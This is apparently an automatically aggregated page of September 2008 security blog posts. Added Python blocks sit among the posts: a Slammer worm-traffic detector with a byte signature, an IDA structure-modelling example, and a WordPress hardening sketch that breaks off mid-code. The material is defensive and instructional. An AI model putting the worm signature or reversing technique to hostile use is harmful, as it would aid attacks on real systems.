Disclaimer:

This is an automatically generated site. The domain owners, staff and associated parties are in no way responsible for the content. All content is copyright their respective owners.

Updated every 15 minutes.

September 05, 2008

Contest: Cory Doctorow's Cipher Wheel Rings - Blogs - Schneier On Security

Cory Doctorow wanted a secret decoder wedding ring, and he asked me to help design it. I wanted something more than the standard secret decoder ring, so this is what I asked for: "I want each wheel to be the alphabet, with each letter having either a dot above, a dot below, or no dot at all. The first wheel...


ThreatLinQ: Taking Out the Trash - Research - DVLabs

Posted by Mike Dausin
One of the often cited benefits of IPS is the ability to keep ancient attacks from 'polluting' your otherwise pristine network.  The fact is, attacks such as Code Red and SQL Slammer are still out there in force. And while there may be literally a 0% chance of these attacks being successful on a machine in your environment, there is simply no reason to let them into your network. 

Of course, when we tell people this, the first question we often get asked is "are these attacks REALLY out there still?"  The answer is definitely "Yes!"

Take Slammer for instance.  Over the last month, ThreatLinQ has detected no less than 73,300 infected slammer sources which produced tens of millions of packets.  Sure, slammer packets are small, and not likely to cause too much congestion.  But why let Slammer on your network at all, when it can be easily blocked? 

I should also point out that, although Slammer would never appear on YOUR network (our readers/customers tend to be on the ball), infections do still occur. Below is a graph of a host that was clearly infected on 8/22/2008.



I wonder if the admin of this network has pulled out all his/her hair yet trying to figure out why the net is so slow...
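The two checks the post argues for, counting the Slammer sources hitting the perimeter and spotting a host inside that has become a source itself, as an added example that is not part of the DVLabs post or of ThreatLinQ. It assumes a monitored range of 10.0.0.0/8 and uses the widely documented shape of a Slammer datagram (UDP to port 1434, 376-byte payload, 0x04 opcode followed by 0x01 filler) as a simplified match; a real IPS signature matches specific content bytes. The sample records are constructed from documentation address ranges and a stand-in payload, not captured worm traffic.

```python
from collections import Counter
from ipaddress import ip_address, ip_network

# Monitored address space; assumed for this example.
HOME_NET = ip_network("10.0.0.0/8")

# Simplified shape of a Slammer datagram: SQL Server Resolution Service port,
# fixed 376-byte payload, 0x04 opcode followed by a run of 0x01 filler.
SLAMMER_PORT = 1434
SLAMMER_PAYLOAD_LEN = 376
SLAMMER_PREFIX = b"\x04" + b"\x01" * 16


def looks_like_slammer(dport: int, payload: bytes) -> bool:
    """True when a UDP datagram has the port, length and prefix of a Slammer packet."""
    return (dport == SLAMMER_PORT
            and len(payload) == SLAMMER_PAYLOAD_LEN
            and payload.startswith(SLAMMER_PREFIX))


def summarize(records):
    """records: iterable of (src_ip, dst_ip, dst_port, payload) for UDP datagrams.

    Returns hits per source, the distinct external sources (the kind of figure
    the post quotes) and any internal host that is itself sending Slammer packets,
    which is the infected-host case the post's graph shows."""
    hits = Counter()
    internal_infected = set()
    for src, _dst, dport, payload in records:
        if not looks_like_slammer(dport, payload):
            continue
        hits[src] += 1
        if ip_address(src) in HOME_NET:
            internal_infected.add(src)
    external_sources = {s for s in hits if ip_address(s) not in HOME_NET}
    return {
        "matches": sum(hits.values()),
        "per_source": dict(hits),
        "external_sources": external_sources,
        "internal_infected": internal_infected,
    }


# Constructed stand-in payload with the right length and prefix (not real worm bytes).
SLAMMER_LIKE = SLAMMER_PREFIX + b"\x01" * (SLAMMER_PAYLOAD_LEN - len(SLAMMER_PREFIX))

# Constructed sample traffic using documentation address ranges.
SAMPLE_RECORDS = [
    ("192.0.2.17", "10.1.2.3", 1434, SLAMMER_LIKE),
    ("192.0.2.17", "10.1.2.4", 1434, SLAMMER_LIKE),
    ("203.0.113.9", "10.1.9.9", 1434, SLAMMER_LIKE),
    ("198.51.100.20", "10.1.2.3", 1434, b"\x04CLNT"),      # short, legitimate instance query
    ("10.1.7.77", "192.0.2.200", 1434, SLAMMER_LIKE),      # internal host spraying outward
    ("10.1.7.77", "203.0.113.1", 1434, SLAMMER_LIKE),
    ("10.1.2.3", "10.1.2.50", 53, b"\x12\x34"),            # unrelated DNS traffic
]

if __name__ == "__main__":
    result = summarize(SAMPLE_RECORDS)
    print("slammer packets:", result["matches"])
    print("distinct external sources:", sorted(result["external_sources"]))
    print("internal hosts that look infected:", sorted(result["internal_infected"]))
```

The per-source counter is what you would plot to get a graph like the one in the post; the `internal_infected` set is the alert worth paging on, since an inbound Slammer packet is noise but an outbound one means a host on your side is compromised.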



Using Shredded Checks as Packaging Material - Blogs - Schneier On Security

This seems like a really dumb idea....


Twitter Targeted by Malware Distributors - Blogs - Darknet

This one is of interest to me as I do actually use Twitter as a microblogging service and to keep up with what various friends are up to. It’s quite an interesting web app, especially paired with something like Twitterfox in your browser and Twibble in your mobile phone. It must have made it big now though [...]

Read the full post at darknet.org.uk


September 04, 2008

Privacy Policies: Perception vs. Reality - Blogs - Schneier On Security

New paper: "What Californians Understand About Privacy Online," by Chris Jay Hoofnagle and Jennifer King. From the abstract: A gulf exists between California consumers' understanding of online rules and common business practices. For instance, Californians who shop online believe that privacy policies prohibit third-party information sharing. A majority of Californians believes that privacy policies create the right to require a...


MindshaRE: Using Structures - Research - DVLabs

Posted by Cody Pierce
This week on MindshaRE we take a quick look at structures. I often see new reverse engineers skipping the creation of structures they encounter when disassembling a binary. While it is true that they can be slightly time consuming to create, the payoff in the end can far outweigh the minimal time investment. The biggest benefit will be during such things as OO method invocation, file format parsing, or packet tracing.  Hopefully the examples I have will convince you to spend those extra 20 minutes defining clean structures next time you run across them in a binary.

MindshaRE is our weekly look at some simple reverse engineering tips and tricks. The goal is to keep things small and discuss every day aspects of reversing. You can view previous entries here by going through our blog history.

Everyone knows what a structure is.  A defined container for structured data that will be programmatically accessed.  In a higher level language access to these elements is typically by name, for instance sk_buff->len.  However, in assembly, we have to use an offset from the start of the structure.  This may be where new reverse engineers go cross-eyed. It's easy to understand that accessing sk_buff->len gets the length of the packet data in our structure.  But when you encounter "mov eax, dword ptr [ebx+30h]" things may get a little confusing (Note: I didn't look up the actual offset for sk_buff->len). No need to fret though, assembly can be much easier to understand if we spend time defining structures, and their members, into a more readable form.

First, let's look at the structures window in IDA (Shift+F9).  Opening it up doesn't look too inviting, apart from some help text.  Here is what you probably see.

 ; Ins/Del : create/delete structure
 ; D/A/*   : create structure member (data/ascii/array)
 ; N       : rename structure or structure member
 ; U       : delete structure member
If you have loaded symbols you may have some additional structures listed, but in general this window is empty when disassembling a new binary.  The commands should be straightforward.  When we want a new structure we use Ins/Del (Sorry Apple laptops!) to create it.  Doing so will ask us for a name.  There also exist some extra options like "Create before current structure" and "Don't include in the list" which are useful, but in most cases will not be needed.

Before we finish with this window by hitting "OK", click the "Add standard structure" button.  A slew of important data structures should populate the window.  The almost 10k structures listed are common structures that occur in various SDKs like the Windows Platform SDK.  Choosing one of the structures will automatically add it and all of its associated members, which can be extremely helpful. You can experiment with these later; for now hit "Cancel" and create your new structure. You should get the following.
00000000 example         struc ; (sizeof=0x0)
00000000 example         ends
This is our empty structure.  Not very exciting, so let's add a member. Clicking the top of the example structure and hitting "D" gives us a new field, or member.  The default size of newly created members/fields is one byte.  We can easily change this by selecting the field and hitting "D" again.  Just like working with data in the disassembly window, repeated "D" keystrokes will cycle this between the supported data types (Byte, Word, Dword).  Also notice the size of the structure will update accordingly.  Let's add a few more just for fun.  Here's mine.
00000000 example         struc ; (sizeof=0x10)
00000000 field_0         dd ?
00000004 field_4         dd ?
00000008 field_8         dd ?
0000000C field_C         db ?
0000000D field_D         db ?
0000000E field_E         db ?
0000000F field_F         db ?
00000010 example         ends
The automatic naming of members is handy.  As you can see they are named according to their offset as well.  For instance field_4 will be "example+4" in assembly.  Let's say that through our reversing efforts we know that example+4 is a dword containing a type.  We can change this name and get that much closer to a readable structure we can use in our disassembly. To achieve this highlight field_4 and hit "N".  This brings up a name window.  Let's put in "type" for the name.

00000000 example         struc ; (sizeof=0x10)
00000000 field_0         dd ?
00000004 type            dd ?
00000008 field_8         dd ?
0000000C field_C         db ?
0000000D field_D         db ?
0000000E field_E         db ?
0000000F field_F         db ?
00000010 example         ends

Fine. We have a structure represented in our structures window.  Now we must use it. One of the most important things to keep in mind when we start to use these structures is to be certain we are applying them correctly.  It does you zero good to apply this example struct to something that is actually an exception handler structure.  Let's pretend this assembly snippet is accessing our newly created structure.

.text:01004130     push    dword ptr [eax+4]
.text:01004133     call    _createnum

This is typical structure access.  Without applying a type to it the argument seems ambiguous.  Let's fix that by highlighting the offset "4" in "eax+4" and hitting "T".  This brings up our defined structures.  You should see the following.



Selecting our example.type member will convert the meaningless "eax+4" into the easily readable assembly below.
.text:01004130     push    [eax+example.type]
.text:01004133     call    _createnum
Creating and applying structures may seem tedious.  But I promise it will make your life much easier when you start applying your newly created structures to your binary. Creating structures can indeed get overwhelming when dealing with large structures.  For instance, creating a structure with over 30 members by hand is a nightmare.  In this case we can automate the task.
#include <idc.idc>

// Create a structure made of consecutive dword members named by offset
// (field_0, field_4, ...), the same layout you would build by hand with "D".
static main()
{
    auto id, rc;
    auto i, count;
    auto sname, oname;

    sname = AskStr("user_struct", "Structure name");
    // The prompt asks for a byte count; dividing by 4 gives the number of dword members.
    count = AskLong(64, "Structure size in bytes (filled with dword members)") / 4;

    id = AddStrucEx(-1, sname, 0);      // -1: append to the structure list; 0: not a union
    if (id == -1)
        return;                          // name already taken or invalid

    for (i = 0; i < count; i++)          // "<", so exactly count members are created
    {
        oname = "field_" + ltoa(i * 4, 16);
        // 0x20000400 = FF_DWRD | FF_DATA: a 4-byte data member at offset i*4
        rc = AddStrucMember(id, oname, i * 4, 0x20000400, -1, 4);
    }
}
Running this will create a structure with your name and number of dword elements.  Writing IDC scripts to define structures can be very powerful.  Let's take another look at a more complex example combining all of these techniques.

Adobe Acrobat's plugin architecture makes extensive use of structures in the form of classes.  Taking a look at the assembly will give you nightmares if you do not define and apply structure labels.  Take a look at a small example.
.text:23834076     mov     esi, dword_239345BC
.text:2383407C     mov     eax, dword_2393459C
.text:23834081     add     esi, 18h
.text:23834084     call    dword ptr [eax+600h]
...                
.text:238340A7     movzx   eax, ax
.text:238340AA     mov     [ebp+var_4], eax
.text:238340AD     mov     eax, dword_239345BC
.text:238340B2     push    esi
.text:238340B3     call    dword ptr [eax+30h]
.text:238340B6     add     esp, 24h
.text:238340B9
.text:238340B9 loc_238340B9:
.text:238340B9     mov     eax, dword_23934560
.text:238340BE     call    dword ptr [eax+0Ch]
With nothing labeled this is nonsense.  Fixing up the names and adding structures gives us the following.
.text:23834076     mov     esi, pASExtraHFT
.text:2383407C     mov     eax, pAcroViewHFT
.text:23834081     add     esi, 18h
.text:23834084     call    [eax+s_acroviewHFT.AVAppGetLanguageEncoding] ; AVProcs.h
...                
.text:238340A7     movzx   eax, ax
.text:238340AA     mov     [ebp+var_4], eax
.text:238340AD     mov     eax, pASExtraHFT
.text:238340B2     push    esi
.text:238340B3     call    [eax+s_asextraHFT.ASTextDestroy] ; ASExtraProcs.h
.text:238340B6     add     esp, 24h
.text:238340B9
.text:238340B9 loc_238340B9:
.text:238340B9     mov     eax, pCoreHFT
.text:238340BE     call    [eax+s_coreHFT.ACPopExceptionFrame] ; AcroRd32.ACPopExceptionFrame
Much better.  We can now focus on what this function is doing, instead of the methods it is invoking.  Also notice when we apply a name we get a comment inserted.  You can do this by adding comments to members in your defined structure. All of these names were automatically added to the IDB via a script.  A little research and work before reversing has saved countless hours.

There are many other facets to adding and using structures.  I have touched on their basic usage.  Try to play around with creating structures and applying them to your IDB.  I can't stress enough how important it is when getting into larger projects.  Hope this gave you a good starting point.

-Cody

[UPDATE] I uploaded the vt2st.idc IDC script that Ali mentioned below in the comments.
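The mechanics the post walks through (members keyed by offset, IDA's field_<offset> naming, renaming, the dword-filled structure the IDC script builds, and applying a structure to a [reg+offset] operand with "T"), as an added example that is not part of the DVLabs post and does not use IDA's API. It is a stand-alone Python model written for this page, so it runs outside IDA; the structure rendering mimics the structures window. It goes one step beyond the post on the "apply them correctly" point: an offset that falls outside the structure, lands inside a member, or is accessed with a width different from the member's size is flagged instead of silently relabelled, since those are the usual signs that the wrong structure is being applied.

```python
import re
from dataclasses import dataclass, field

DIRECTIVE = {1: "db", 2: "dw", 4: "dd"}          # IDA data directive per member size
PTR_WIDTH = {"byte": 1, "word": 2, "dword": 4}   # operand-size prefix -> access width


@dataclass
class Struct:
    """A structure as the structures window holds it: members keyed by offset."""
    name: str
    members: dict = field(default_factory=dict)  # offset -> [member_name, size]

    @property
    def size(self) -> int:
        return max((off + sz for off, (_, sz) in self.members.items()), default=0)

    def add(self, offset: int, size: int, name=None) -> str:
        """Add a member ('D' in IDA); refuse overlaps; default to IDA's field_<hex> naming."""
        if size not in DIRECTIVE:
            raise ValueError("unsupported member size %d" % size)
        for off, (nm, sz) in self.members.items():
            if off < offset + size and offset < off + sz:
                raise ValueError("member at 0x%X overlaps %s" % (offset, nm))
        name = name or "field_%X" % offset
        self.members[offset] = [name, size]
        return name

    def rename(self, offset: int, new_name: str) -> None:
        """'N' in IDA: give a member a meaningful name."""
        self.members[offset][0] = new_name

    def member_at(self, offset: int):
        """(name, size) of the member that starts exactly at offset, else None."""
        m = self.members.get(offset)
        return tuple(m) if m else None

    def render(self) -> str:
        """Listing in the layout the structures window shows."""
        lines = ["%08X %-15s struc ; (sizeof=0x%X)" % (0, self.name, self.size)]
        for off in sorted(self.members):
            nm, sz = self.members[off]
            lines.append("%08X %-15s %s ?" % (off, nm, DIRECTIVE[sz]))
        lines.append("%08X %-15s ends" % (self.size, self.name))
        return "\n".join(lines)


def build_dword_struct(name: str, size_bytes: int) -> Struct:
    """What the post's IDC script does: one dword member every 4 bytes."""
    s = Struct(name)
    for off in range(0, size_bytes, 4):
        s.add(off, 4)
    return s


def parse_ida_number(tok: str) -> int:
    """IDA writes hex with an 'h' suffix (30h, 0Ch); bare digits are decimal."""
    return int(tok[:-1], 16) if tok.lower().endswith("h") else int(tok, 10)


# Matches "dword ptr [eax+4]" and "[ebx+30h]"; the size prefix is optional.
ACCESS_RE = re.compile(r"(?:(byte|word|dword) ptr )?\[(\w+)\+([0-9A-Fa-f]+h?)\]")


def annotate(line: str, struct: Struct, reg: str) -> str:
    """Apply `struct` to [reg+offset] operands, as the 'T' keystroke does, but
    warn when the offset or the access width does not fit the structure."""
    warnings = []

    def repl(m):
        width, base, off_tok = m.groups()
        if base != reg:
            return m.group(0)
        off = parse_ida_number(off_tok)
        if off >= struct.size:
            warnings.append("offset 0x%X lies outside %s (sizeof=0x%X)"
                            % (off, struct.name, struct.size))
            return m.group(0)
        member = struct.member_at(off)
        if member is None:
            warnings.append("offset 0x%X is not the start of a member" % off)
            return m.group(0)
        name, size = member
        if width and PTR_WIDTH[width] != size:
            warnings.append("%d-byte access to %d-byte member %s"
                            % (PTR_WIDTH[width], size, name))
        return "[%s+%s.%s]" % (base, struct.name, name)

    out = ACCESS_RE.sub(repl, line)
    return out + (" ; WARNING: " + "; ".join(warnings) if warnings else "")


def example_struct() -> Struct:
    """The 'example' structure built in the post, with field_4 renamed to 'type'."""
    s = Struct("example")
    for off in (0, 4, 8):
        s.add(off, 4)
    for off in range(0xC, 0x10):
        s.add(off, 1)
    s.rename(4, "type")
    return s


if __name__ == "__main__":
    s = example_struct()
    print(s.render())
    print(annotate("push    dword ptr [eax+4]", s, "eax"))         # the post's snippet
    print(annotate("mov     eax, dword ptr [ebx+30h]", s, "ebx"))  # offset beyond sizeof
    print(annotate("mov     al, byte ptr [eax+4]", s, "eax"))      # width mismatch
```

The post's `push dword ptr [eax+4]` comes out as `push [eax+example.type]`, exactly as IDA renders it once the structure is applied; the two other lines show what a mismatch looks like, which is the check worth making before you commit a structure to an operand.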


Movie Plot Threats in The Guardian - Blogs - Schneier On Security

We spend far more effort defending our countries against specific movie-plot threats, rather than the real, broad threats. In the US during the months after the 9/11 attacks, we feared terrorists with scuba gear, terrorists with crop dusters and terrorists contaminating our milk supply. Both the UK and the US fear terrorists with small bottles of liquid. Our imaginations run...


XTest - VoIP Infrastructure Security Testing Tool - Blogs - Darknet

What is XTest? XTest is a simple, practical, and free, wired 802.1x supplicant security tool implementing the RFC 3847 EAP-MD5 Authentication method. It can be used to assess the password strength within wired ethernet environments that rely on 802.1x to protect IP Phones and the VoIP Infrastructure against rogue PC access. XTest is developed in C...

Read the full post at darknet.org.uk


September 03, 2008

Blue Box SE#026 - Astricon 2007 presentation on VoIP security and Asterisk - Podcasts - Blue Box

Synopsis:  Blue Box Special Edition #26: Astricon 2007 presentation - "Hacking and Attacking VoIP Systems: What you need to worry about"


Welcome to Blue Box: The VoIP Security Podcast Special Edition #26, a 55-minute podcast  from Dan York and Jonathan Zar covering VoIP security news, comments and opinions.   

Download the show here (MP3, 6MB) or subscribe to the RSS feed to download the show automatically. 

Show Content:

A year ago in September 2007, I (Dan York) spoke at Astricon 2007 in Arizona, USA, about "Hacking and Attacking VoIP Systems: What You Need To Worry About" My presentation covered a lot of the typical VoIP security threats, tools and best practices but also expanded a bit into specific security issues with Asterisk.  Please do keep in mind that it has been a year since this presentation and so some of the issues I mention have been addressed. (Astricon, for those who don't know, is an annual developer conference for those who work with the Asterisk open source telephony platform. Astricon 2008 is, in fact, coming up in about 3 weeks but I will not be attending this year.)

The slides for this talk are available from Slideshare:

(And yes, at some point I'll sync the audio with the slides.)

Production assistance on this Special Edition was provided by Michael Graves who had a very tough task given the poor quality of the recording that I gave to him!  Kudos to Michael for getting it to sound as good as it does.

Comments, suggestions and feedback are welcome either as replies to this post  or via e-mail to blueboxpodcast@gmail.com.  Audio comments sent as attached MP3 files are definitely welcome and will be played in future shows.  You may also call the listener comment line at either +1-415-830-5439 or via SIP to 'bluebox@voipuser.org' to leave a comment there. 

Thank you for listening and please do let us know what you think of the show.



Diaries Written in Code - Blogs - Schneier On Security

Many throughout history....


How To: Detect Cross Site Scripting Vulnerabilities using XSSDetect - WebApp - CGISecurity.com


Google releases Chrome Web browser - WebApp - CGISecurity.com


Download the 5th Website Security Statistics Report - Blogs - Jeremiah Grossman

Whew, what a mountain of work! I’m ecstatic the complete 5th installment of our Website Security Statistics Report report (all 13-pages) is finally published and available for everyone to see – and comment. I’m also extremely proud that we’re able to capture a measurable improvement in overall website security. Good news from inside InfoSec!? I know, weird huh!? We still have a long way to go, but these statistics show we’re on the right path and doing the right things:

  • Find and prioritize all websites
  • Find and fix website vulnerabilities
  • Implement a secure software development process
  • Utilize a defense-in-depth website security strategy

Today’s webinar went extremely well, slides are available for those interested. And some quick numbers:

Total Websites: 687
Identified vulnerabilities: 11,234
Unresolved vulnerabilities: 3,541 (66% resolved)
Websites HAVING HAD at least one serious issue: 82%
Websites CURRENTLY WITH at least one serious issue: 61%
Average vulnerabilities per website: 5

The shiny new WhiteHat Top Ten

Yes! CSRF finally makes the list!

Also covered is:
- Collection methodology
- Time-to-fix and remediation metrics
- Industry vertical comparisons
- Best practices & lessons learned

Feedback on what other numbers people would like us to report on in the future is very welcome.



Sucking Data off of Cell Phones - Blogs - Schneier On Security

Don't give someone your phone unless you trust them: There is a new electronic capture device that has been developed primarily for law enforcement, surveillance, and intelligence operations that is also available to the public. It is called the Cellular Seizure Investigation Stick, or CSI Stick as a clever acronym. It is manufactured by a company called Paraben, and is...


Chinese hacker joke…paying the pain forward - Blogs - The Dark Visitor

Got to confess, I don’t get most Chinese humor.  The couple of times I’ve searched for jokes in Chinese hacker forums, this one pops up. Never bothered to translate it because it’s bad, very bad.  Someone has taken the time to translate it for me so, without further delay:

Hacker = 黑客 = black rogue(??)~ short for BR
Pc newbie = 小白 = xiao bai ( most probably Ms white) ~ short for XB

A conversation between BR and XB

BR:I am now in control of your PC
XB:How did you do it?
BR:By using a trojan
XB:……………….where?I dont see it
BR:Open your control panels
XB:………………where is my control panels
BR:………………Below your computer!!
XB:I dont see it in “My Computer”
BR:…….Forget it,just forget everything i said

later on~~
BR:I am now in control of your PC again
XB:oh~~
BR: ….scared?!
XB:what good timing,can you help clear those annoying virus? these days there are alot of them in my PC
BR:………..

then……..
XB:why do you always come and go as you please?
BR:well….you could always use a firewall
XB:but…….if there is a firewall, then u wont be able to access my PC
BR:its not that,its just that i wanna have more fun hacking ur PC,if its secureless like this its real damn
boring

If you feel you can’t live without learning the fate of Xiao Bai and the hacker…go here masochist.



Korean defense spokesman says stuff guaranteed to come back to haunt him then… - Blogs - The Dark Visitor

Gives valuable stats on Chinese hackers attacks:

According to the Korea Information Security Agency, there were some 2,120 cases of hacking or hacking attempts against various Korean government agencies and entities during the month of March, 2008.

Of them, 53 percent originated from Chinese Internet addresses, while 14 percent came from the United States. Some five percent came from Japanese sources.

I think an International Space Station official said something about having a secure system too…100% hack proof.



Productive Botnets - Blogs - Darknet

We all know what botnets are (think so), but anyway let’s see a proper definition of botnets taken from shadowserver… and I quote: A botnet is a collection of computers, connected to the internet, that interact to accomplish some distributed task. Although such a collection of computers can be used for useful and constructive...

Read the full post at darknet.org.uk


September 02, 2008

Rethinking the Desktop Model - Blogs - GNUCITIZEN

It is time to rethink the way the desktop works. Some of my ideas may seem radical but sometimes evolution is the only solution to all of our problems. Read on…

RETHINK

I have had this idea for quite some time now. Picture the following: a stripped-down Linux kernel with all security mechanisms turned up to the max; levels 2 to 5 configured to run just the most basic set of services, such as the scheduler, the hardware abstraction and support mechanisms, printing etc., a web server, a browser and the X environment. The low-level processes keep the system running while X, the browser and the web server provide the application-layer functionality.

Each application is hosted on the web server. Technically speaking we have an application server. The browser provides the rendering engine, while the x puts everything on the display. No compilation. Everything is interpreted and under the strict control of the browser and the web server.

The browser is not just the typical browser you will find. Each application opens in its own browser process. It renders just like any other application you may have on your desktop. The only difference is that applications in this environment are written on top of standard, widely-adopted technologies. No dependencies and no cross-platform issues. Applications are easy to patch, extend and control.

The web server is just like any other web server. A module for more granular user control will be required, i.e. different applications will be able to run with different privileges and users should be able to identify themselves without the need to login, etc. Of course, this is only needed if such features are required.

I think that this type of environment will provide more granular control over each application. For example, if an application misbehaves then we can either fix the code on the fly or patch it on the web server with a config hack. We’ve got the technology even to jail the app in a chroot environment. Fixes can be easily implemented at any stage. Because we are using standard technologies, fixes will be easier and more robust. The browser also provides functionality to extend its chrome via extensions. Developers can implement a layer on top of the application layer to provide even greater control, customization and interactivity.

Obviously, because everything becomes a web application, for security reasons, the browser should differentiate between local and remote applications but at the same time make sure that both types are as transparent to the user as possible.

This model is far from being perfect. In fact, it has many flaws. I know that there are even some failed attempts to do something almost similar. However, this model seems so right. It is 2008 and we are still stuck with technologies designed 20 years ago. No wonder why they often break. Perhaps their time has come to an end? I don’t know. Let the crowd decide. I am no longer a perfectionist. My philosophy is: whatever works will be employed to complete the given task. But sometimes I think what it would have been if things were otherwise.


Software to Facilitate Retail Tax Fraud - Blogs - Schneier On Security

Interesting: Thanks to a software program called a zapper, even technologically illiterate restaurant and store owners can siphon cash from computer cash registers and cheat tax officials. [...] Zappers alter the electronic sales records in a cash register. To satisfy tax collectors, the tally of food orders, for example, must match the register's final cash total. To hide the removal...


Article: SDL Embraces The Web - WebApp - CGISecurity.com


Which ASP.NET Controls Automatically HTML Entity Output Encodes? - WebApp - CGISecurity.com


Security ROI - Blogs - Schneier On Security

Return on investment, or ROI, is a big deal in business. Any business venture needs to demonstrate a positive return on investment, and a good one at that, in order to be viable. It's become a big deal in IT security, too. Many corporate customers are demanding ROI models to demonstrate that a particular security investment pays off. And in...


Google Chrome - Blogs - GNUCITIZEN

It is true what many of you have heard. Google is releasing their own browser. Google Chrome, as they call it, is based on WebKit rendering engine and introduces some novel approaches to interacting with web technologies. I must say, it is very exciting to see all of this happening.

Valley Wars: The Third Browser War

What makes Google Chrome different is its architecture. The browser is no longer a single-threaded process. Each tab is actually a separate process with its own memory space. I am not sure if we are talking about threads or actual program instances, but what is more important is that when you close a tab, you are virtually terminating the process. At least, this is what Google says.

This seems to have some interesting implications for the security of the browser. If you corrupt the tab’s memory space then you will crash only that particular process. The browser and all other tabs should continue working just fine, as if nothing had happened. This approach has its own advantages and disadvantages. The advantages are obvious: the user experience is intact. The disadvantages are that pwning might get easier. It is too early for me to say more on this topic because I haven’t seen Google Chrome in action, but I have the slight suspicion that there will be some security consequences as a result of this security model.

Google Chrome also implements a new privacy feature. I think they call it incognito or something. Basically, if you browse while in incognito mode, nothing ever gets logged. I think that this is a cool feature and I believe that the IE8 team is working on something similar.

Another interesting feature which I need to mention is that popups are not blocked but they open in a minimized window. If you want to see them you just drag the popup icon and there you go. Again, this is very interesting but I can already see how this may be abused. For example, it will make a huge difference if the rendering engine has already processed the content of the popup even if it is minimized. If this is the case, then this feature could turn into a very handy mechanism of hiding malicious activities. For example, if during the attack, the page flickers or the attacker is rendering too many corrupted ANIs :) then certainly, hiding it behind a minimized popup will be a great way of avoiding detection by casual observation. Of course these are pure speculations.

Google Chrome also provides sandboxing functionality. Apparently each process is sandboxed, but I have no details on how that was implemented. I would say that perhaps sandboxing JavaScript is fairly easy, but doing that on a process level may not be as much. Maybe each process runs with an unprivileged account which does not have many rights. But still, it must have some rights in order to do something. So taking over a process may not result in immediate pwnage, but it will certainly give the attackers some advantage. I am very interested to learn how this sandboxing mechanism is implemented for the various operating systems, if the browser is cross-platform of course, which I believe is the case.

If everything is implemented correctly, which I hardly doubt, then Google Chrome may turn into a very nice technology I may consider using it in the near future. However, none of these security features interest me as much as those that allow me to prevent poorly coded web applications leaking my details over unencrypted channels. Or even features which will prevent certain types of CSRF and XSS attacks. I’ve said it before! Most of my data does not reside on my computer any more. Of course this philosophy had some bad side effects on me, but my point is that the data is on the Web and therefore I am concerned how my browser protects me when it comes down to Web related bugs. I believe that Google Chrome lacks mostly that and if they decide to implement any of recommendations then in my eyes, I will certainly have a winner in the upcoming browser wars.


September 01, 2008

UK Hacker Gary McKinnon Loses Appeal Against Extradition - Blogs - Darknet

So the latest news in the Gary McKinnon case, in which he was fighting extradition: he started off with appeals against US extradition, then won the right to a Lords appeal extradition hearing, then lost the Lords case and went to the European Court. Sadly, it seems he lost his appeal [...]

Read the full post at darknet.org.uk


Chinese hacker more popular than university president…wins 92% approval rating! - Blogs - The Dark Visitor

Breaking!! Double-edged sword turns out to be…well, double-edged.  A Chinese hacker broke into the Tsinghua University website and left a stinging rebuke of the education system under the university president’s name.  Turned out to be hugely popular, go figure.

GOOD: Standing army ready to fight all your political battles abroad

BAD: Same standing army ready to take you to task domestically

The Web site of the elite Tsinghua University, considered as competitive as Beijing University and even superior in the sciences, was victimized by hackers recently. An article purporting to express the views of the university’s president, Gu Binglin, criticized China’s university education system in harsh and even dirty terms. The majority of Chinese netizens expressed support and understanding toward this unidentified hacker, however.

Throw the hacker in jail? With a 92% approval rating, the university’s president should have kept his mouth shut and hired the kid as a speech writer.



My LA Times Op Ed on Photo ID Checks at Airport - Blogs - Schneier On Security

Opinion The TSA's useless photo ID rules No-fly lists and photo IDs are supposed to help protect the flying public from terrorists. Except that they don't work. By Bruce Schneier August 28, 2008 The TSA is tightening its photo ID rules at airport security. Previously, people with expired IDs or who claimed to have lost their IDs were subjected to...


August 31, 2008

Let’s fix the Web - Blogs - GNUCITIZEN

I am heavily frustrated from the way the Web works today. Everything seems to be broken beyond reason. I really want to fix the damn thing but I realize that it is not up to me to do that. It is up to all of us to make sure that code is written in the most secure possible way. Can we do that? Perhaps not! What can we do then?

Broken Heart

Before I get to the point, I need to tell you how I fixed my insecure Wordpress blog. Wordpress has many security shortcomings and I was so frustrated that I decided to fix whatever I can once and for all. I believe that we can fix the Web in a similar way, but first these are all the patches that were implemented:

  1. mark all cookies as secure to prevent leakage over unencrypted channels
  2. mark all cookies as httpOnly to prevent session hijacks due to Cross-site Scripting vulnerabilities
  3. if you try to login, force SSL to prevent leakage of credentials
  4. when logged in, make sure that all URLs are HTTPS enabled to prevent leakage of sensitive information
  5. when over HTTPS make sure that all URLs that point to your domain start with https:// to prevent leakage of any data
  6. restrict 443 (HTTPS) to blog users and admins only
  7. disable error messages everywhere to prevent leakage of sensitive information
  8. allow upload of only known file types such as jpg, gif and png (I will add a check for the gifar problem soon)
  9. embed an IDS type of solution (PHPIDS in my case) to block known attacks
  10. integrate with blogsecurify to enable continues security checks and warn the admin if a problem is found

I believe that this makes the blog a lot more secure. There still might be ways to attack it but this is all I can do in the most reasonable possible way, without completely breaking Wordpress. All of these fixes are implemented as a plugin which I will make available for free download soon.
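The server-side half of that list (items 1 to 5 and 8), as an added example that is not the author's plugin and is not Wordpress code: small Python functions that do what each patch describes, so the rules can be read and tested in isolation. The hostname `blog.example.com` is assumed; the Set-Cookie values and HTML snippets in the test are constructed. The upload check deliberately stops at an extension allowlist plus a magic-byte check, because a GIF/JAR polyglot (the gifar problem the author says is still to be handled) is a valid GIF at the front and passes both.

```python
import re

# Assumed blog hostname for this example.
HOST = "blog.example.com"


def harden_set_cookie(value: str) -> str:
    """Items 1 and 2: add Secure and HttpOnly to a Set-Cookie value if absent.
    Secure keeps the cookie off plain-HTTP requests; HttpOnly keeps it away from
    script, so an XSS cannot simply read document.cookie."""
    parts = [p.strip() for p in value.split(";") if p.strip()]
    present = {p.split("=", 1)[0].lower() for p in parts[1:]}
    if "secure" not in present:
        parts.append("Secure")
    if "httponly" not in present:
        parts.append("HttpOnly")
    return "; ".join(parts)


def https_redirect(path: str, scheme: str, logged_in: bool, host: str = HOST):
    """Items 3 and 4: the login page and every logged-in request must be on HTTPS.
    Returns the redirect target, or None when the request may proceed as-is."""
    if scheme == "https":
        return None
    if path.startswith("/wp-login.php") or logged_in:
        return "https://" + host + path
    return None


def rewrite_own_links(html: str, host: str = HOST) -> str:
    """Item 5: point http:// references to our own host at https:// so a page
    served over HTTPS does not fetch its own resources in the clear.
    The lookahead keeps 'http://blog.example.com.evil.net' from matching."""
    pattern = r"http://" + re.escape(host) + r"(?=[/\"'\s>?#]|$)"
    return re.sub(pattern, "https://" + host, html)


# Item 8: allowlist of upload types and the leading bytes each must carry.
UPLOAD_MAGIC = {
    "jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff",
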